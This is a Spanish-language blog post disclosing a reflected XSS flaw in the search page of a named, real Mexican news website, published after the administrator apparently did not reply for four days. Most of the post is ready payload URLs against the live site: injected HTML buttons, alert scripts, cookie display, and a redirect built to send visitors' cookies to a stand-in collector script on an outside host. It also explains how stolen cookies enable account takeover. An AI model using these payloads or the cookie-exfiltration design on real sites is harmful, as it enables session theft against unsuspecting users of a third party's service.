Vulnerabilidad Xss En La Pagina De El Debate De Culiacan

Hace días en el foro de undercode me encontré con este tema:
https://underc0de.org/foro/hacking-showoff/(xss)-anonymousmx-com/

El cual un compañero expone una vulnerabilidad en la pagina de anonymous mexico, el cual es una vulnerabilidad XSS y que es eso aquí un enlace de wikipedia que explica que es:
https://es.wikipedia.org/wiki/Cross-site_scripting

bueno ha si que sabiendo que es lo que expuso el compañero medí ala tarea de buscar una yo por mi cuenta y no tuve que ir tan lejos, ya que en mi localidad se encuentra una pagina dedicada al periodismo llamada El Debate de Culiacan y testeando un poco la pagina medí cuenta que es vulnerable a ataques XSS, pero no es tan grave al parecer.

Yo al encontrar este fallo envié un mail al administrador de dicha pagina, y ya tengo 4 días sin respuesta alguna, así que decidí mostrarlo qui en mi blog.

La pagina del debate de culiacan es esta:
http://www.debate.com.mx/

y para encontrar esta falla se irán a este link

https://www.debate.com.mx/buscar.html?search=AQUÍ LA INYECCIÓN

Este link es el resultado de realizar una búsqueda en la pagina, así que para realizar una inyección insertaremos comandos HTML los cuales son interpretados por la pagina, cosa que no debería de ser

así que veremos que podemos hacer, primero creare un botón en ella así

https://www.debate.com.mx/buscar.html?search=%3Cinput%20type=button%20value=%27HackeadoByFlamer%27%3E

y el resultado es este



como ven si lo creo, ahora subiremos el nivel, inyectaremos un bloque de código de javascript a ver si se logra y lo que hará dicho bloque sera mandar un mensaje al presionar el botón que creamos, seria así

https://www.debate.com.mx/buscar.html?search=<input type='button' id='100' value='Hackeado_Por_Flamer' onclick='msj()'><script>function msj(){alert(document.getElementById('100').value)}</script>

y nos muestra lo siguiente



y ahora si queremos sacar las cookies al presionar el botón seria asi

https://www.debate.com.mx/buscar.html?search=<input type='button' id='100' value='Hackeado_Por_Flamer' onclick='msj()'><script>function msj(){alert('document.cookie')}</script>

Aclaro que document.cookie debe de ir entre comillas simples por que del otro modo el navegador me marca error, ya detecta un ataque XSS

y el resultado es el siguiente


bueno y dirán de que serviría un ataque de estos si no tengo acceso al servidor ya que javascript se ejecuta en el cliente, pues les comento si fuera una pagina donde se tendría que loguear el usuario como tipo facebook, twitter o simplemente el foro del hacker.net, para hackear al usuario y entrar a su cuenta necesitamos las cookies y para eso el atacante crearía un script que las enviara cuando este diera clic en el enlace.

y se preguntaran como si en el ejemplo anterior ocupábamos darle clic al botón para obtener las cookies, pues para ejecutar un script en esta pagina sin dar clic en el boton seria asi

https://www.debate.com.mx/buscar.html?search=<script>{alert('document.cookie')}</script>

y con esto ya obtenemos las cookies, ahora se preguntaran para enviarlas, pues ami se me ocurre pasarlas por la url y seria algo así

Nota: el siguiente link no funciona

https://www.debate.com.mx/buscar.html?search=<script>{window.location.href='http://webdelhacker.net/loger.php?data=+document.cookie'}</script>

y loger.php tendría que recibir con el comando $_GET en php

y se preguntaran por que no funciona, pues párese que es la pagina del debate que no procesa los : el + y las comillas simples, ya que si nos fijamos en el código sebe lo siguiente


bueno no se que mas decir, hay esta la pagina y si se pueden crear script se pueden hacer varias cosas solo falta imaginación

Saludos Flamer y lo expuesto aquí son con fines educativos no me hago responsable si ala pagina le sucede algo por dar ideas o incitar alas personas